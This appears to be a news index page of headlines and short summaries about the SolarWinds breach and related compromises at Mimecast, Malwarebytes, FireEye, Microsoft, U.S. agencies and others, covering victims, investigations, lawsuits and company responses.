Mimecast said Tuesday that its certificate compromise was carried out by the same threat actor behind the SolarWinds attack and provided hackers with access to customers’ on-premises and cloud services.

5 Security Vendors That Have Reported Cyberattacks Since December
Five cybersecurity vendors disclosed in recent weeks that hackers have attacked their internal systems, compromised their certificates or attempted to access their email accounts. Here’s a rundown of what happened when.

SolarWinds Hackers Access Malwarebytes’ Office 365 Emails
‘Attackers leveraged a dormant email production product within our Office 365 tenant that allowed access to a limited subset of internal company emails,’ Malwarebytes CEO Marcin Kleczynski wrote in a blog post.

SolarWinds Hack Could Cost Cyber Insurance Firms $90 Million
‘Although the SolarWinds attack is a cyber catastrophe from a national security perspective, insurers may have narrowly avoided a catastrophic financial incident to their businesses,’ says BitSight’s Samit Shah.

5 Things To Know About The Mimecast Hack And Stock Drop
From the type of certificate likely compromised to the impact of this hack on Mimecast’s email security rivals to whether the attack is tied to the SolarWinds breach, here are five big things to know about the Mimecast hack.

Hackers Compromise Mimecast Certificate For Microsoft Authentication
The certificate used to authenticate Mimecast’s Sync and Recover, Continuity Monitor and Internal Email Protect (IEP) products to Microsoft 365 has been compromised by a sophisticated threat actor.

Hackers Taunt FireEye’s Kevin Mandia At Home With Postcard: Report
The FBI is investigating a mysterious postcard sent to CEO Kevin Mandia’s home days after FireEye found initial evidence of a hacking operation on federal agencies and private businesses, Reuters reports.

Sophos

SolarWinds CEO: Attack Was ‘One Of The Most Complex And Sophisticated’ In History
Hackers first accessed SolarWinds in September 2019 and went out of their way to avoid being detected by the company’s software development and build teams, SolarWinds CEO Sudhakar Ramakrishna says.

SolarWinds’ New CEO Will Make These 5 Changes Post-Hack
From resetting privileged credentials and re-signing all digital certificates to manually checking source code and rolling out threat hunting software, here are five critical security improvements new SolarWinds CEO Sudhakar Ramakrishna plans to make.

SolarWinds Fights Back With Chris Krebs, Alex Stamos Hires
‘Armed with what we have learned of this attack, we are also reflecting on our own security practices and seeking opportunities to enhance our posture and policies. We have brought in the expertise of Chris Krebs and Alex Stamos to assist in this review,’ SolarWinds tells CRN.

SolarWinds Hackers Compromise Confidential Court Filings
The Russian hackers behind the SolarWinds attack have apparently compromised the federal courts’ electronic case filing system, putting ‘highly sensitive non-public documents’ at great risk.

SolarWinds To Pay Ex-CEO $312K To Assist With Investigations
SolarWinds has agreed to pay former CEO Kevin Thompson $62,500 for each of the next five months as the embattled company faces a likely wave of lawsuits and government probes into its conduct around the hack.

SolarWinds Hackers Got Into U.S. Justice Department’s Emails
‘At this point, the number of potentially accessed Office 365 mailboxes appears limited to around 3 percent, and we have no indication that any classified systems were impacted,’ the Justice Department announces.

Feds: SolarWinds Breach Is Likely Russian Intel Gathering Effort
Fewer than ten U.S. government agencies experienced follow-on activity on their systems after being compromised through a malicious SolarWinds Orion update, the Cyber Unified Coordination Group says.

SolarWinds Hit With Class-Action Lawsuit Alleging Securities Violations
The first class-action lawsuit brought against SolarWinds following its colossal breach accuses the company of making materially false and misleading statements about its security posture throughout 2020.

SolarWinds Hackers Gain Access To Microsoft’s Source Code
One Microsoft account compromised by suspected Russian hackers had been used to view source code in a number of source code repositories, but none of the code itself was altered, Microsoft disclosed Thursday.

Here Are 24 Reported Victims Of The SolarWinds Hack (So Far)
From tech giants, internet service providers and IT solution providers to federal agencies and county governments, here’s a deeper look at 24 of the publicly identified victims of the colossal SolarWinds hack.

CrowdStrike Fends Off Attack Attempted By SolarWinds Hackers
The suspected Russian hackers behind the massive SolarWinds attack attempted to hack CrowdStrike through a Microsoft reseller’s Azure account but were ultimately unsuccessful, CrowdStrike says.

Five Solution Providers Breached By SolarWinds Hackers: Researchers
The SolarWinds hackers called for proceeding with the second stage of their attack on Stratus Networks, Digital Sense, ITPS and Netdecisions, and had an unknown response to compromising Deloitte, Truesec says. Digital Sense said it wasn’t impacted by the campaign since the company doesn’t use SolarWinds.

Top Treasury Email Accounts Exposed In SolarWinds Hack: Report
The hackers performed a complex step inside Microsoft Office 365 to create an encrypted “token” that tricked the Treasury’s system into thinking the hackers were legitimate users, The New York Times said.

Microsoft: A 2nd Group May Have Also Breached SolarWinds
A ‘different threat actor’ may be responsible for the malware known as Supernova that has been found installed in SolarWinds Orion.

Kevin Mandia: 50 Firms ‘Genuinely Impacted’ By SolarWinds Attack
FireEye CEO Kevin Mandia acknowledges the SolarWinds hack ‘is an attack very consistent with’ what the Russian foreign intelligence service is known for, but didn’t want to officially blame the campaign on them.

Intel, Nvidia Swept Up In SolarWinds Attack: WSJ
The chipmakers say they are investigating the impact of downloading a software update containing malicious code for SolarWinds Orion — the trigger that has left many SolarWinds customers vulnerable — though there is no evidence of any negative impact.

Unclassified Treasury Systems Hit By SolarWinds Hack: Mnuchin
‘At this point, we do not see any break-in into our classified systems. Our unclassified systems did have some access,’ Secretary of the Treasury Steve Mnuchin tells CNBC Monday morning.

Trump Downplays SolarWinds Hack, Pompeo Blames Russia
‘Russia, Russia, Russia is the priority chant when anything happens because Lamestream [Media] is, for mostly financial reasons, petrified of discussing the possibility that it may be China (it may!),’ Trump tweeted.

Cisco Hacked Through SolarWinds As Tech Casualties Mount
Roughly two dozen computers in a Cisco lab were compromised through malicious SolarWinds Orion updates, Bloomberg reported. Cisco says there isn’t currently any known impact to its offers or products.

Datto Offers All MSPs Free Scanner To Find Signs Of FireEye, SolarWinds Hack
‘Now is a time to remain vigilant and take an active role in hardening systems against these, now known, tactics,’ Datto CISO Ryan Weeks writes in a blog post announcing the scanner.

VMware Flaw Used To Hit Choice Targets In SolarWinds Hack: Report
A VMware vulnerability that allowed federated authentication abuse was used by the SolarWinds hackers to attack valuable targets, KrebsOnSecurity said. VMware said it didn’t have any indication of this happening.

SolarWinds Should Have Been More ‘Vigilant’: Palo Alto Networks CEO
‘I am not going to give them a free pass,’ says Palo Alto Networks CEO Nikesh Arora. ‘They should have been more vigilant and diligent, but I think this is a very sophisticated, very complex attack. The fact they (the Russians) got in there not only did they do sophisticated things, they also got lucky that this is a piece of software which then went unnoticed for six to nine months, and now it’s embedded in the infrastructure of thousands of customers.’

SolarWinds Hack Compromised 40-plus Microsoft Customers
A decisive plurality – 44 percent – of the Microsoft customers compromised through SolarWinds are actually in the IT sector, and include software and security firms as well as IT services and equipment providers.

Microsoft Breached Via SolarWinds As Scope Of Destruction Widens: Report
Suspected Russian hackers capitalized on Microsoft’s wide use of SolarWinds to infiltrate the software giant, and then used Microsoft’s own products to further their attacks on other victims, Reuters said. Microsoft pushed back on the report.

SolarWinds Deploys CrowdStrike To Secure Systems After Hack
SolarWinds says its breached Orion network monitoring platform now meets the security requirements of U.S. federal and state agencies following the release of a final hotfix Tuesday night.

Feds: SolarWinds Attack ‘Poses a Grave Risk’ To Government, Business
The U.S. government says it has evidence of additional initial access vectors beyond the SolarWinds Orion supply chain compromise, but noted that those other attack methods are still being investigated.

SolarWinds MSP To Revoke Digital Certificates For Tools, Issue New Ones As Breach Fallout Continues
‘I think they’re afraid. They’ve got liability, and they don’t know what to say, so everybody’s told to keep their mouth shut. Instead of being focused on the issue at hand, they’re worried about lawsuits,’ SolarWinds MSP partner Rich Delany tells CRN.

SolarWinds Hack ‘One Of The Worst In The Last Decade’: Analyst
‘There are a lot of white knuckles around this attack ... Even though much of it is unknown, right now people are fearing the worst,’ Daniel Ives of Wedbush Securities tells CRN.

Malware Used In SolarWinds Attack Can Now Be Blocked: FireEye
‘Under certain conditions, the malware would terminate itself and prevent further execution... This killswitch will affect new and previous... infections by disabling... deployments that are still beaconing to avsvmcloud[.]com,’ FireEye tells CRN.

Microsoft’s Role In SolarWinds Breach Comes Under Scrutiny
Microsoft has become ensnared in probes surrounding the colossal U.S. government hack, with media reports and company messages focusing on Office 365, Azure Active Directory and a key domain name.

$286M Of SolarWinds Stock Sold Before CEO, Hack Disclosures
Silver Lake and Thoma Bravo said they weren’t aware of the cyberattack at the time of the sale, but didn’t respond to questions about whether they knew Sudhakar Ramakrishna had been selected as SolarWinds’ next CEO.

10 Things To Know About The SolarWinds Breach And Its U.S. Government Impact
From how nation-state hackers evaded detection to why federal agencies were ordered to immediately power down Orion to its impact on the SolarWinds MSP business, here are the most important things to know about the SolarWinds breach.

Homeland Security Latest Breach Victim Of Russian Hackers: Report
A spokesman said the Department of Homeland Security is aware of reports of a breach and is currently investigating the matter. The U.S. Treasury and Commerce Departments were also reportedly hacked.

US Calls On Federal Agencies To Power Down SolarWinds Orion Due To Security Breach
An emergency directive issued by the U.S. government calls on all federal civilian agencies to disconnect or power down SolarWinds Orion IT management tools because they are being used to facilitate an active exploit.

Infected SolarWinds Updates Used To Compromise Multiple Organizations: FireEye
Nation-state hackers gained access to government, consulting, technology and telecom firms around the world through trojanized updates to SolarWinds’ Orion network monitoring tool, according to FireEye.

8 Big Things To Know About The State-Sponsored FireEye Hack
From who’s suspected to be behind the FireEye hack and how they remained hidden, to what FireEye and intelligence officials are doing to minimize the fallout from the attack, here’s a look at what partners need to know.

FireEye Hacked By Nation-State Group Seeking Government Info
‘This attack is different from the tens of thousands of incidents we have responded to throughout the years. The attackers tailored their world-class capabilities specifically to target and attack FireEye,’ says CEO Kevin Mandia.